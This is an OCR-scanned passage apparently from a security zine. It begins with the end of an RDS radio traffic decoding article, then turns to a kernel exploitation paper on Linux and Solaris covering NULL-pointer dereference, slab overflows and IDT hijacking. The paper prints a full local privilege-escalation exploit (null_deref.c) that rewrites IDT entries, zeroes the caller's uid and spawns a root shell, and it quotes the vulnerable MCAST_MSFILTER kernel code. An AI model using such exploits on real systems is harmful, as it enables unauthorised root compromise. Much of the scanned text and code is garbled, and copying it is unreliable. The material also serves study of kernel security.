Duration and Persistence: 000 (no explicit duration given) 
Diversion advice: 0 
Direction: 1 (-) 
Extent: O11 (3) 
Event: 00001110011 (115 - slow traffic (with average speeds Q)) 
Location: 0000110000001100 (3084) 
Decoded Location: 
Location code type: POINT 
Name ID: 11013 (Sv. Grande Raccordo Anulare) 
Road code: 266 (Roma-Ss16) 
GPS: 41.98449 N 12.49321 E 
Link: http://maps.google.com/maps?11=41.98449,12.49321&spn=0.3,0.3& 


q=41.98449,12.49321 


...and so on. 


The ’Collected PSN’ variable holds all the character of Programme Service 
name seen so far, this way we can track (just like RDS FM Radio do) the 
name of the station: 


# ./srdsd -p 5201 rds_dump.raw | grep "Collected PSN" | head 


Collected PSN: DI 
Collected PSN: DIOL 
Collected PSN: DIO1 
Collected PSN: RADIOL 
Collected PSN: RADIOL 


Check out '’-H’ switch for html’ized output in /tmp (which can be useful for 
directly following the Google Map links). We also have a version that plots 
all the traffic on Google Map using their API, if you are interested in it 

just email us. 


Have fun. 


--[ I. References 


1] - Italian RDS-TMC Location Table Database 
https: //www2.ilportaledellautomobilista.it/info/infofree?idUser=1&idBody=14 


2] - Philips FM1216 DataSheet 
http://pvr.sourceforge.net/FM1216.pdf 


3] -— PVR Hardware Database 
http://pvrhw.goldfish.org 


4] -— SGS-Thompson Microelectronics TDA7330 
http: //www.datasheetcatalog.com/datasheets_pdf/T/D/A/7/TDA7330.shtml 


5] - Philips SAA6579 
http://www.datasheetcatalog.com/datasheets_pdf/S/A/A/6/SAA6579.shtml1 


6] -— uJDM PIC Programmer 
http://www.semis.demon.co.uk/uJDM/uJDMmain.htm 
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http://www.maxim-ic.com/getds.cfm?qv_pk=1798&ln=en 


[8] - Xecircuit 


http://xcircuit.ece. jhu.edu 


--[ II. Code 


Code also available at http://dev.inversepath.com/rds/ 


<++> Simple RDS Decoder 0.1 - srdsd.u 


begin 644 srdsd 
M(RSO=7-R+V) 1; B] P97) 


L"B, * (R!3:6UP; &4@ 


M, OHC"B, @5&AI<R! #; V1 
M86YD (%5G;’D 
M(S-O<’ ER: 6=H=""R, #\W(S 
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Here’s the schematic of the RDS Demodulator. You can directly use it to 
view / print the circuit or import the file with Xcircuit[9] to 
modify the diagram. 
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explotation. The growing diffusion of "Security prevention" approaches 
(no-exec stack, no-exec heap, ascii-armored library mmapping, mmap/stack 
and generally virtual layout randomization, just to point out the most 
known) has/is made/making userland explotation harder and harder. 

Moreover there has been an extensive work of auditing on application codes, 
so that new bugs are generally more complex to handle and exploit. 


The attentions has so turned towards the core of the operating systems, 
towards kernel (in)security. This paper will attempt to give an insight 
into kernel explotation, with examples for IA-32, UltraSPARC and AMD64. 
Linux and Solaris will be the target operating systems. More precisely, an 
architecture on turn will be the main covered for the three main 
exploiting demonstration categories : slab (IA-32), stack (UltraSPARC) and 
race condtion (AMD64). The details explained in those ’deep focus’ apply, 
thou, almost in toto to all the others exploiting scenarios. 


Since explotation examples are surely interesting but usually do not show 
the "effective" complexity of taking advantages of vulnerabilities, a 
couple of working real-life exploits will be presented too. 


[ 1 The playground 


Let’s just point out that, before starting : "bruteforcing" and "kernel" 
aren’t two words that go well together. One can’t just crash over and 
over the kernel trying to guess the right return address or the good 
alignment. An error in kernel explotation leads usually to a crash, 
panic or unstable state of the operating system. 

The "information gathering" step is so definitely important, just like 

a good knowledge of the operating system layout. 


---[ 1.1 - Kernel/Userland virtual address space layouts 


From the userland point of view, we don’t see almost anything of the 
kernel layout nor of the addresses at which it is mapped [there ar 

indeed a couple of information that we can gather from userland, and 
we’re going to point them out after]. 

Netherless it is from the userland that we have to start to carry out our 
attack and so a good knowledge of the kernel virtual memory layout 

(and implementation) is, indeed, a must. 


There are two possible address space layouts 


— kernel space on behalf of user space (kernel page tables ar 

replicated over every process; the virtual address space is splitted in 
two parts, one for the kernel and one for the processes). 

Kernels running on x86, AMD64 and sun4m/sun4d architectures usually have 
this kind of implementation. 


separated kernel and process address space (both can use the whole 
address space). Such an implementation, to b fficient, requires a 
dedicated support from the underlaining architecture. It is the case of 
the primary and secondary context register used in conjunction with the 
ASI identifiers on the UltraSPARC (sun4u/sun4v) architecture. 


To see the main advantage (from an exploiting perspective) of the first 
approach over the second one we need to introduce the concept of 
"process context". 
Any time the CPU is in "Supervisor" mode (the well-known ringO on ia-32), 
the kernel path it is executing is said to be in interrupt context if it 
hasn’t a backing process. 
Code in interrupt context can’t block (for example waiting for demand 
paging to bring in a referenced userspace page): the scheduler is 
unable to know what to put to sleep (and what to wake up after). 


Code running in process context has instead an associated process 
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(usually the one that "generated" the kernel code path, for example 
issuing a systemcall) and is free to block/sleep (and so, it’s free to 
reference the userland virtual address space). 


[This is a good news on systems which implement a combined user/kernel 
address space, since, while executing at kernel level, we can 
dereference (or jump to) userland addresses. 

The advantages are obvious (and many) 


—- we don’t have to "guess" where our shellcode will be and we can 
write it in C (which makes easier the writing, if needed, of long and 
somehow complex recovery code) 


- we don’t have to face the problem of finding a suitable large and 
safe place to store it. 


—- we don’t have to worry about no-exec page protection (we’re free to 
mmap/mremap as we wish, and, obviously, load directly the code in 
.text segment, if we don’t need to patch it at runtime). 


— we can mmap large portions of the address space and fill them with 
nops or nop-alike code/data (useful when we don’t completely 
control the return address or the dereference) 


—- we can easily take advantage of the so-called "NULL pointer 


dereference bugs" ("technically" described later on) 
The space left to the kernel is so limited in size : on the x86 
architecture it is 1 Gigabyte on Linux and it fluctuates on Solaris 


depending on the amount of physical memory (check 
usr/src/uts/i86pc/os/startup.c inside Opensolaris sources). 

This fluctuation turned out to be necessary to avoid as much as possible 
virtual memory ranges wasting and, at the same time, avoid pressure over 
the space reserved to the kernel. 


The only limitation to kernel (and processes) virtual space on systems 
implementing an userland/kerneland separated address space is given by the 
architecture (UltraSPARC I and II can reference only 44bit of the whole 
64bit addressable space. This VA-hole is placed among 0x0000080000000000 
and OXFFFFFUFFFFFFFFFF) . 


This memory model makes explotation indeed harder, because we can’t 
directly dereference the userspace. The previously cited NULL pointer 
dereferences are pretty much un-exploitable. 
Moreover, we can’t rely on "valid" userland addresses as a place to store 
our shellcode (or any other kernel emulation data), neither we can "return 
to userspace". 


We won’t go more in details here with a teorical description of the 
architectures (you can check the reference manuals at [1], [2] and [3]) 
since we’ve preferred to couple the analysis of the architectural and 
operating systems internal aspects relevant to explotation with the 
effective exploiting codes presentation. 


---[ 1.2 - Dummy device driver and real vulnerabilities 


As we said in the introduction, we’re going to present a couple of real 
working exploit, hoping to give a better insight into the whole kernel 
explotation process. 

We’ve written exploit for 


—- MCAST_MSFILTER vulnerability [4], used to demonstrate kernel slab 
overflow exploiting 


- sendmsg vulnerability [5], used to demonstrate an effective rac 
condition (and a stack overflow on AMD64) 
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—- madwifi SIOCGIWSCAN buffer overflow [21], used to demonstrate a real 
remote exploit for the linux kernel. That exploit was already released 
at [22] before the exit of this paper (which has a more detailed 
discussion of it and another ’dummy based’ exploit for a more complex 
scenario) 


Moreover, we’ve written a dummy device driver (for Linux and Solaris) to 
demonstrate with examples the techniques presented. 

A more complex remote exploit (as previously mentioned) and an exploit 
capable to circumvent Linux with PaX/KERNEXEC (and userspace/kernelspac 
separation) will be presented too. 


---[ 1.3 - Notes about information gathering 


Remember when we were talking about information gathering ? Nearly every 
operating systems ’exports’ to userland information useful for developing 
and debugging. Both Linux and Solaris (we’re not taking in account now 
’security patches’) expose readable by the user the list and addresses of 
their exported symbols (symbols that module writer can reference) 
/proc/ksyms on Linux 2.4, /proc/kallsyms on Linux 2.6 and /dev/ksyms on 
Solaris (the first two are text files, the last one is an ELF with SYMTAB 
section). 
Those files provide useful information about what is compiled in inside 
the kernel and at what addresses are some functions and structs, addresses 
that we can gather at runtime and use to increase the reliability of our 
exploit. 


But theese information could be missing on some environment, the /proc 
filesystem could be un-mounted or the kernel compiled (along with some 
security switch/patch) to not export them. 

This is more a Linux problem than a Solaris one, nowadays. Solaris exports 
way more information than Linux (probably to aid in debugging without 
having the sources) to the userland. Every module is shown with its 
loading address by /’modinfo’, the proc interface exports the address of 
the kernel ’proc_t’ struct to the userland (giving a crucial entrypoint, 
as we will see, for the explotation on UltraSPARC systems) and the ’kstat’ 
utility lets us investigate on many kernel parameters. 


In absence of /proc (and /sys, on Linux 2.6) there’s another place we can 
gather information from, the kernel image on the filesystem. 
There are actually two possible favourable situations 


- the image is somewhere on the filesystem and it’s readable, which is 
the default for many Linux distributions and for Solaris 


he target host is running a default kernel image, both from 
nstallation or taken from repository. In that situation is just a 
atter of recreating the same image on our system and infere from it. 
his should be always possible on Solaris, given the patchlevel (taken 
rom ’uname’ and/or '’showrev -p’). 
Things could change if OpenSolaris takes place, we’ll see. 


HS ect 


7 


The presence of the image (or the possibility of knowing it) is crucial 
for the KERN_EXEC/separated userspace/kernelspac nvironment explotation 
presented at the end of the paper. 


Given we don’t have exported information and the careful administrator has 


removed running kernel images (and, logically, in absence of kernel memory 
leaks ;)) we’ve one last resource that can help in explotation : the 
architecture. 

Let’s take the x86 arch, a process running at ring3 may query the logical 


address and offset/attribute of processor tables GDT,LDT,IDT,TSS 


— through ’sgdt’ we get the base address and max offset of the GDT 
-— through ’sldt’ we can get the GDT entry index of current LDT 

-— through ’sidt’ we can get the base address and max offset of ID! 
- through ’str’ we can get the GDT entry index of the current TSS 
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The best choice (not the only one possible) in that case is the IDT. The 
possibility to change just a single byte in a controlled place of it 
leads to a fully working reliable exploit [*]. 


*] The idea here is to modify the MSB of the base_address of an IDT entry 
and so "hijack" the exception handler. Logically we need a controlled 
byte overwriting or a partially controlled one with byte value below 
the ’kernelbase’ value, so that we can make it point into the userland 
portion. We won’t go in deeper details about the IDT 

layout/implementation here, you can find them inside processor manuals 

1] and kad’s phrack59 article "Handling the Interrupt Descriptor 

Table" [6]. 

The NULL pointer dereferenc xploit presented for Linux implements 

this technique. 


As important as the information gathering step is the recovery step, which 
aims to leave the kernel in a consistent state. This step is usually 
performed inside the shellcode itself or just after the exploit has 
(successfully) taken place, by using /dev/kmem or a loadable module (if 
possible). 

This step is logically exploit—-dependant, so we will just explain it along 
with the examples (making a categorization would be pointless). 


[ 2 Kernel vulnerabilities and bugs 


We start now with an excursus over the various typologies of kernel 
vulnerabilities. The kernel is a big and complex beast, so even if we’re 
going to track down some "common" scenarios, there are a lot of more 
possible "logical bugs" that can lead to a system compromise. 


We will cover stack based, "heap" (better, slab) based and NULL/userspace 
dereference vulnerabilities. As an example of a "logical bug" a whole 
chapter is dedicated to race condition and techniques to force a kernel 
path to sleep/reschedule (along with a real exploit for the sendmsg [4] 
vulnerability on AMD64). 


We won’t cover in this paper the range of vulnerabilities related to 
virtual memory logical errors, since those have been already extensively 
described and cleverly exploited, on Linux, by iSEC [7] people. 

Moreover, it’s nearly useless, in our opinion, to create a "crafted" 
demonstrative vulnerable code for logical bugs and we weren’t aware of any 
_public_ vuln of this kind on Solaris. If you are, feel free to submit it, 
we’ll be happy to work over ;). 


---[ 2.1 - NULL/userspace dereference vulnerabilities 


This kind of vulnerability derives from the using of a pointer 
not-initialized (generally having a NULL value) or trashed, so that it 
points inside the userspace part of the virtual memory address space. 

The normal behaviour of an operating system in such a situation is an oops 
or a crash (depending on the degr of severity of the dereference) while 
attempting to access un-mapped memory. 


But we can, obviously, mmap that memory range and let the kernel find 
"valid" malicius data. That’s more than enough to gain root priviledges. 
We can delineate two possible scenarios 


- instruction pointer modification (direct call/jmp dereference, 
called function pointers inside a struct, etc) 


—- "controlled" write on kernelspac 


The first kind of vulnerability is really trivial to exploit, it’s just a 
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matter of mmapping the referenced page and put our shellcode ther 

If the dereferenced address is a struct with inside a function pointer (or 
a chain of struct with somewhere a function pointer), it is just a matter 
of emulating in userspace those struct, make point the function pointer 

to our shellcode and let/force the kernel path to call it. 


We won’t show an example of this kind of vulnerability since this is the 
"last stage" of any more complex exploit (as we will see, we’1l be always 
trying, when possible, to jump to userspace). 


The second kind of vulnerability is a little more complex, since we can’t 
directly modify the instruction pointer, but we’ve the possibility to 
write anywhere in kernel memory (with controlled or uncontrolled data). 


Let’s get a look to that snipped of code, taken from our Linux dummy 
device driver 


< stuff/drivers/linux/dummy.h > 


[ance] 


struct user_data_ioctl 


{ 
int size; 
char *buffer; 
}; 


< / > 
< stuff/drivers/linux/dummy.c > 


static int alloc_info(unsigned long sub_cmd) 
{ 

struct user_data_ioctl user_info; 

struct info_user *info; 

struct user_perm *perm; 


abs} 


if (copy_from_user (&user_info, 
(void __user*) sub_cmd, 
sizeof (struct user_data_ioctl))) 
return —-EFAULT; 


if (user_info.size > MAX _STORE_SIZE) [1] 
return —-ENOENT; 


info = kmalloc(sizeof (struct info_user), GFP_KERNEL); 
if (!info) 
return —ENOMEM; 


perm = kmalloc(sizeof (struct user_perm), GFP_KERNEL) ; 
if (!perm) 
return —ENOMEM; 


info->timestamp = 0;//sched_clock(); 

info->max_size = user_info.size; 

info->data = kmalloc(user_info.size, GFP_KERNEL); [2] 
/* unchecked alloc */ 


perm->uid = current-—>uid; 
info->data->perm = perm; [3] 


glob_info = info; 
eee, 


static int store_info(unsigned long sub_cmd) 
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glob_info->data->perm->uid current-—>uid; [4] 


Due to the integer signedness issue at [1], we can pass a huge value 

to the kmalloc at [2], making it fail (and so return NULL). 

The lack of checking at that point leaves a NULL value in the info->data 
pointer, which is later used, at [3] and also inside store_info at [4] to 
save the current uid value. 


What we have to do to exploit such a code is simply mmap the zero page 
(0x00000000 —- NULL) at userspace, make the kmalloc fail by passing a 
negative value and then prepare a ’fake’ data struct in the previously 
mmapped area, providing a working pointers for ’perm’ and thus being able 
to write our ‘uid’ anywhere in memory. 


At that point we have many ways to exploit the vulnerable code (exploiting 
while being able to write anywhere some arbitrary or, in that case, 
partially controlled data is indeed limited only by imagination), but it’s 
better to find a "working everywhere" way. 


As we said above, we’re going to use the IDT and overwrite one of its 
entries (more precisely a Trap Gate, so that we’re able to hijack an 
exception handler and redirect the code-flow towards userspace). 

Each IDT entry is 64-bit (8-bytes) long and we want to overflow the 
'base_offset’ value of it, to be able to modify the MSB of the exception 
handler routine address and thus redirect it below PAGE_OFFSET 
(Oxc0000000) value. 


Since the higher 16 bits are in the 7th and 8th byte of the IDT entry, 
that one is our target, but we’re are writing at [4] 4 bytes for the ‘uid’ 
value, so we’re going to trash the next entry. It is better to use two 
adiacent ’seldomly used’ entries (in case, for some strange reason, 
something went bad) and we have decided to use the 4th and 5th entries 
#OF (Overflow Exception) and #BR (BOUND Range Exeeded Exeption). 


At that point we don’t control completely the return address, but that’s 
not a big problem, since we can mmap a large region of the userspace and 
fill it with NOPs, to prepare a comfortable and safe landing point for our 
exploit. The last thing we have to do is to restore, once we get th 
control flow at userspace, the original IDT entries, hardcoding the values 
inside the shellcode stub or using an lkm or /dev/kmem patching code. 


At that point our exploit is ready to be launched for our first 
‘rootshell’. 


As a last (indeed obvious) note, NULL dereference vulnerabilities are 
only exploitable on ’combined userspace and kernelspace’ memory model 
operating systems. 


---[ 2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c 


< stuff/expl/null_deref.c > 


include <sys/ioctl.h> 
include <stdio.h> 
include <string.h> 
include <stdlib.h> 
include <sys/types.h> 
include <sys/stat.h> 
include <fcntl.h> 
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include <sys/mman.h> 


include "dummy.h" 


define DEVICE "/dev/dummy" 
define NOP 0x90 
define STACK_SIZ 8192 


al 


5 


//#define STACK_SIZE 4096 


define PAGE_SIZE 0x1000 
#define PAGE_OFFSET 12 
define PAGE MASK ~ (PAGE _SIZE -1) 
define ANTANI "antani" 
uint32_t bound_check [2]={0x00, 0x00}; 
extern void do_it(); 
uid_t UID; 
void do_bound_check () 
{ 
asm volatile("bound %1, %0\t\n" : "=m" (bound_check) : "a" (OxFF)); 
} 
/* simple shell spown */ 
void get_root () 
{ 
char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL }; 
char *envp[] = { "TERM=linux", "PSl=y0y0\\$", "“BASH_HISTORY=/dev/null", 
"HISTORY=/dev/null", "history=/dev/null", 


"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NUL 
L }; 


execve("/bin/sh", argv, envp); 
fprintf(stderr, "[**] Execve failed\n"); 
exit(-1); 


/* this function is called by fake exception handler: take 0 uid and restore trashed entry 
tad 
void give_priv_and_restore (unsigned int thread) 


{ 


Tent 47 
unsigned short addr; 
unsigned int* p = (unsigned int*)thread; 


/* simple trick */ 

for(i=0; i < Ox1l00; i++) 

if( (p[i] == UID) && (p[it+l] == UID) && (p[it2] == UID) && (p[it3] == UID) ) 
pli] = 0, plitl] = 0; 


#define CODE _SIZE Oxle 
void dummy (void) 
{ 
asm("do_it:;" 
"addl $6, (%%esp);" // after bound exception EIP points again to the bound instruction 
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"movl (s%eax), %%Seax;" 
"add $100, %%teax;" 
"pushl %S%eax;" 
"movl Sgive_priv_and_restore, %%ebx;" 
"call *%%ebx;" 
"popl %%eax;" 
"popa; WwW 
Miret; ™ 


"nop; nop; nop; nop;" 


"i"( “(STACK SIZE -1)) 

); 
return; 
} 
struct idt_struct 
{ 

uint1l6_t limit; 

uint32_t base; 
} __attribute__((packed)); 


static char *allocate_frame_chunk (unsigned int base_addr, 
unsigned int size, 


} 


unsigned int round_addr = 


unsigned int diff 
unsigned int len 


char *map_addr 


if (map_addr == MAP 


len, 
PROT_R 


base_addr & PAGI 
base_addr - rou 
(size + diff + 


MAP_FIX 


return MAP_FAILED; 


if (code_addr) 
{ 
memset (map_addr, 
memcpy (map_addr, 
} 
else 
memset (map_addr, 


return 


(char*) base_ 


NOP, 


0x00, 


addr; 


void* code_addr) 


E MASK; 
nd_addr; 


(PAGE_SIZ 


E-1)) 


mmap ( (void*) round_addr, 


EAD |PROT_WRITE, 
ED | MAP_ANONYMOUS |MAP_PRIVATE 


len); 
code_addr, 


size); 


len); 


inline unsigned int *get_zero_page (unsigned int size) 


{ 


} 


#define BOUND_1} 


return 


ENTRY 5 


unsigned int get_BOUND_address () 


{ 


} 


struct idt_struct idt; 


asm volatile ("sidt 
return idt.base + 


60\t\n" 
(8*BOUND_ENTRY) ; 


"=m" (idt)) j 


unsigned int prepare_jump_code () 


{ 


UID = getuid(); 


unsigned int base_address 


/* set 


global uid */ 
((UID & Ox0000FFO0) 


(unsigned int*)allocate_frame_chunk (0x00000000, 


<< 16) 


size, 


+ 


& 


PAGE_MASK; 


NULL) ; 


((UID & OXxFF) 


<< 


16); 
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} 


printf("Using base address of: 0x%08x-0x%08x\n", base_address, 


char *addr = allocate_frame_chunk (base_address, 0x20000, NULL); 


if (addr == MAP_FAILED) 
{ 


perror("unable to mmap jump code"); 
exit (-1); 
} 


memset ((void*)base_address, NOP, 0x20000); 
memcpy ((void*) (base_address + 0x10000), do_it, CODE_SIZE 


7 
— 
x 


return base_address; 


int main(int argc, char *argv[]) 


{ 


struct user_data_ioctl user_ioctl; 
unsigned int *zero_page, *jump_pages, save_ptr; 


zero_page = get_zero_page (PAGE_SIZE) ; 

if (zero_page == MAP_FAILED) 

{ 
perror("mmap: unable to map zero page"); 
exit (-1); 

} 


jump_pages = (unsigned int*) prepare_jump_code(); 


int ret, fd = open(DEVICE, O_RDONLY), alloc_size; 


if(arge > 1) 


alloc_size = atoi(argv[1]); 
else 

alloc_size = PAGE_SIZE-8; 
if(fd < 0) 


{ 
perror("open: dummy device"); 
exit (-1); 

} 


memset (&user_ioctl, 0x00, sizeof (struct user_data_ioctl)); 
user_ioctl.size = alloc_size; 


ret = ioctl(fd, KERN_IOCTL_ALLOC_INFO, é&user_ioctl); 
if(ret < 0) 
{ 


perror ("ioctl KERN_IOCTL_ALLOC_INFO"); 
exit (-1); 


/* save old struct ptr stored by kernel in the first word */ 
save_ptr = *zero_page; 


base_address + 0x20000 


/* compute the new ptr inside the IDT table between BOUND and INVALIDOP exception */ 


printf ("IDT bound: %x\n", get_BOUND_address())j; 
*zero_page = get_BOUND_address() + 6; 


user_ioctl.size=strlen(ANTANI) +1; 
user_ioctl.buffer=ANTANI; 


ret = ioctl(fd, KERN_IOCTL_STORE_INFO, &user_ioctl)j; 


getchar(); 


-1) 
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do_bound_check(); 


/* restore trashed ptr */ 
*zero_page = sSave_ptr; 


ret = ioctl(fd, KERN_IOCTL_FREE_INFO, NULL); 
if(ret < 0) 
{ 


perror ("ioctl KERN_IOCTL_FREE_INFO"); 
exit(-1); 
} 


get_root (); 


return 0; 


< / > 


---[ 2.2 - The Slab Allocator 


The main purpose of a slab allocator is to fasten up the 
allocation/deallocation of heavily used small '’objects’ and to reduce the 
fragmentation that would derive from using the page-based on 

Both Solaris and Linux implement a slab memory allocator which derives 
from the one described by Bonwick [8] in 1994 and implemented in Solaris 
2.4. 


The idea behind is, basically : objects of the same type are grouped 
together inside a cache in their constructed form. The cache is divided in 
'slabs’, consisting of one or more contiguos page frames. 

Everytime the Operating Systems needs more objects, new page frames (and 
thus new ’slabs’) are allocated and the object inside are constructed. 
Whenever a caller needs one of this objects, it gets returned an already 
prepared one, that it has only to fill with valid data. When an object is 
‘freed’, it doesn’t get destructed, but simply returned to its slab and 
marked as available. 


Caches are created for the most used objects/structs inside the operating 
system, for example those representing inodes, virtual memory areas, etc. 
General-purpose caches, suitables for small memory allocations, are 
created too, one for each power of two, so that internal fragmentation is 
guaranted to be at least below 50%. 
The Linux kmalloc() and the Solaris kmem_alloc() functions use exactly 
those latter described caches. Since it is up to the caller to ’clean’ the 
object returned from a slab (which could contain ’dead’ data), wrapper 
functions that return zeroed memory are usually provided too (kzalloc(), 
kmem_zalloc()). 


An important (from an exploiting perspective) ’feature’ of the slab 
allocator is the ’bufctl’, which is meaningful only inside a fr object, 
and is used to indicate the ‘’next fr object’. 

A list of free object that behaves just like a LIFO is thus created, and 


we’1ll see in a short that it is crucial for reliable explotation. 


To each slab is associated a controlling struct (kmem_slab_t on Solaris, 
slab_t on Linux) which is stored inside the slab (at the start, on Linux, 
at the end, on Solaris) if the object size is below a given limit (1/8 of 
the page), or outside it. 

Since there’s a 'cache’ per ‘object type’, it’s not guaranted at all that 
those ‘objects’ will stay exactly in a page boundary inside the slab. That 
‘free’ space (space not belonging to any object, nor to the slab 
controlling struct) is used to ’color’ the slab, respecting the object 
alignment (if ’free’ < ’alignment’ no coloring takes place). 
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The first object is thus saved at a ‘’different offset’ inside the slab, 
given from ’color value’ * ‘’alignment’, (and, consequently, the same 
happens to all the subsequent objects), so that object of the same size in 
different slabs will less likely end up in the same hardware cache lines. 


We won’t go more in details about the Slab Allocator here, since it is 
well and extensively explained in many other places, most notably at [9], 
[10], and [11], and we move towards effective explotation. 

Some more implementation details will be given, thou, along with the 
exploiting techniques explanation. 


---[ 2.2.1 - Slab overflow vulnerabilities 


NOTE: as we said before, Solaris and Linux have two different function to 
alloc from the general purpose caches, kmem_alloc() and kmalloc(). That 
two functions behave basically in the same manner, so, from now on we/’1l 
just use /’kmalloc’ and ’/kmalloc’ed memory’ in the discussion, referring 
thou to both the operating systems implementation. 


A slab overflow is simply the writing past the buffer boundaries of a 
kmalloc’ed object. The result of this overflow can be 


— overwriting an adiacent in-slab object. 

—- overwriting a page next to the slab one, in the case we’re overwriting 
past the last object. 

—- overwriting the control structure associated with the slab (Solaris 
only) 


The first case is the one we’re going to show an exploit for. The main 
idea on such a situation is to fill the slabs (we can track the slab 
status thanks to /proc/slabinfo on Linux and kstat -n ’cache_name’ on 
Solaris) so that a new one is necessary. 

We do that to be sure that we’ll have a ’controlled’ bufctl : since the 
whole slabs were full, we got a new page, along with a ’fresh’ bufctl 
pointer starting from the first object. 


At that point we alloc two objects, free the first one and trigger the 
vulnerable code : it will request a new object and overwrite right into 
the previously allocated second one. If a pointer inside this second 
bject is stored and then used (after the overflow) it is under our 
ontrol. 

his approach is very reliable. 


[e) 
c 


4 


The second case is more complex, since we haven’t an object with a pointer 
or any modifiable data value of interest to overwrite into. We still have 
one chance, thou, using the page frame allocator. 

We start eating a lot of memory requesting the kind of '’page’ we want to 
overflow into (for example, tons of filedescriptor), putting the memory 
under pressure. At that point we start freeing a couple of them, so that 
the total amount counts for a page. 

At that point we start filling the slab so that a new page is requested. 
If we’ve been lucky the new page is going to be just before one of the 
previously allocated ones and we’ve now the chance to overwrite it. 


The main point affecting the reliability of such an exploit is 


- it’s not trivial to ’isolate’ a given struct/data to mass alloc at the 
first step, without having also other kernel structs/data growing 
together with. 

An example will clarify : to allocate tons of file descriptor we need 
to create a large amount of threads. That translates in the allocation 
of all the relative control structs which could end up placed right 
after our overflowing buffer. 


The third case is possible only on Solaris, and only on slabs which keep 
objects smaller than /page_size >> 3’. Since Solaris keeps the kmem_slab 
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struct at the end of the slab we can use the overflow of the last object 
to overwrite data inside it. 


In the latter two ‘’typology’ of exploit presented we have to take in 
account slab coloring. Both the operating systems store the ’next color 
offset’ inside the cache descriptor, and update it at every slab 
allocation (let’s s an example from OpenSolaris sources) 


< usr/src/uts/common/os/kmem.c > 


static kmem_slab_t * 
kmem_slab_create(kmem_cache_t *cp, int kmflag) 
{ 
Pann] 
size_t color, chunks; 
[sia] 
color = cp->cache_color + cp->cache_align; 
if (color > cp->cache_maxcolor) 
color = cp->cache_mincolor; 
cp->cache_color = color; 


a ee 


‘'mincolor’ and ’maxcolor’ are calculated at cache creation and represent 
the boundaries of available caching 


uname -a 
SunOS principessa 5.9 Generic_118558-34 sun4u sparc SUNW, Ultra-5_10 


kstat -n file_cache | grep slab 
slab_alloc 280 
slab_create 2 
slab_destroy 0 
slab_free 0 
slab_size 8192 
kstat -n file_cache | grep align 
align 8 
t kstat -n file_cache | grep buf_size 
buf_size 56 
mdb —-k 
Loading modules: [ unix krtld genunix ip usba nfs random ptm ] 
> ::sizeof kmem_slab_t 
sizeof (kmem_slab_t) = 0x38 
> ::kmem_cache ! grep file_cach 
00000300005fed88 file_cache 0000 000000 56 290 
> 00000300005fed88::print kmem_cache_t cache_mincolor 
cache_mincolor = 0 
> 00000300005fed88::print kmem_cache_t cache_maxcolor 
cache_maxcolor = 0x10 
> 00000300005fed88::print kmem_cache_t cache_color 
cache_color = 0x10 
> r:quit 


As you can see, from kstat we know that 2 slabs have been created and we 
know the alignment, which is 8. Object size is 56 bytes and the size of 
the in-slab control struct is 56, too. Each slab is 8192, which, modulo 56 
gives out exactly 16, which is the maxcolor value (the color range is thus 
0 - 16, which leads to three possible coloring with an alignment of 8). 


Based on the previous snippet of code, we know that first allocation had 
a coloring of 8 ( mincolor == + align == ), the second one of 16 
(which is the value still recorded inside the kmem_cache_t). 
If we were for exhausting this slab and get a new one we would know for 
sure that the coloring would be 0. 


Linux uses a similar /’circolar’ coloring too, just look forward for 
‘kmem_cache_t’->colour_next setting and incrementation. 


Both the operating systems don’t decrement the color value upon freeing of 
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a slab, so that has to be taken in account too (easy to do on Solaris, 
since slab_create is the maximum number of slabs created). 


El 
ve) 


---[ 2.2.2 - Slab overflow exploiting : MCAST_MSFILT! 


Given the technical basis to understand and exploit a slab overflow, it’s 
time for a practical example. 

We’ re presenting here an exploit for the MCAST_MSFILTER [4] vulnerability 
found by iSEC people : 


< linux-2.4.24/net/ipv4/ip_sockglue.c > 


case MCAST_MSFILTER: 
{ 


struct sockaddr_in *psin; 
struct ip_msfilter *msf = 0; 
struct group_filter *gsf = 0; 
int msize, i, ifindex; 


if (optlen < GROUP_FILTER_SIZE (0) ) 
goto e_inval; 


gsf = (struct group_filter *)kmalloc(optlen,GFP_KERNEL); [2] 
if (gsf == 0) { 
err = -ENOBUFS; 
break; 
} 
err = —-EFAULT; 


if (copy_from_user(gsf, optval, optlen)) { [3] 
goto mc_msf_out; 

} 

if (GROUP_FILTER_SIZE(gsf->gf_numsrc) < optlen) { [4] 
err = EINVAL; 
goto mc_msf_out; 


} 


msize = IP_MSFILTER_SIZE(gsf->gf_numsrc) ; [1] 
msf = (struct ip_msfilter *)kmalloc(msize,GFP_KERNEL); [7] 
if (msf == 0) { 

err = -ENOBUFS; 


goto mc_msf_out; 


} 
[aera 


msf—->imsf_multiaddr = psin->sin_addr.s_addr; 


msf->imsf_interface = 0; 
msf—>imsf_fmode = gsf->gf_fmode; 
msf-—>imsf_numsrce = gsf->gf_numsrc; 
err = -EADDRNOTAVAIL,; 
for (i=0; i<gsf->gf_numsrc; ++i) { [5] 
psin = (struct sockaddr_in *)&égsf->gf_slist[il; 
if (psin->sin_family != AF_INET) [8] 
goto mc_msf_out; 
msf—->imsf_slist[i] = psin->sin_addr.s_addr; [6] 


mc_msf_out: 


if (msf) 
kfree(msf); 
if (gsf) 
kfree(gsf); 
break; 


gi [> 
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< linux-2.4.24/include/linux/in.h > 


#define IP_MSFILTER_SIZE(numsrc) \ [1] 

(sizeof (struct ip_msfilter) - sizeof(__u32) \ 

+ (numsrc) * sizeof (__u32) ) 
eee 
#define GROUP_FILTER_SIZE(numsrc) \ [4] 

(sizeof(struct group_filter) - sizeof (struct 
__kernel_sockaddr_storage) \ 

+ (numsrc) * sizeof (struct __kernel_sockaddr_storage) ) 
< / > 


The vulnerability consist of an integer overflow at [1], since we control 
the gsf struct as you can see from [2] and [3]. 

The check at [4] proved to be, initially, a problem, which was resolved 
thanks to the slab property of not cleaning objects on free (back on that 
in a short). 

The for loop at [5] is where w ffectively do the overflow, by writing, 
at [6], the ’psin->sin_addr.s_addr’ passed inside the gsf struct over the 
previously allocated msf [7] struct (kmalloc’ed with bad calculated 
‘'msize’ value). 
This for loop is a godsend, because thanks to the check at [8] we are able 
to avoid the classical problem with integer overflow derived bugs (that is 
writing _a lot_ after the buffer due to the usually huge value used to 
trigger the overflow) and exit cleanly through mc_msf_out. 


As explained before, while describing the ’first explotation approach’, we 
need to find some object/data that gets kmalloc’ed in the same slab and 
which has inside a pointer or some crucial-value that would let us change 
the execution flow. 


We found a solution with the ’struct shmid_kernel’ 
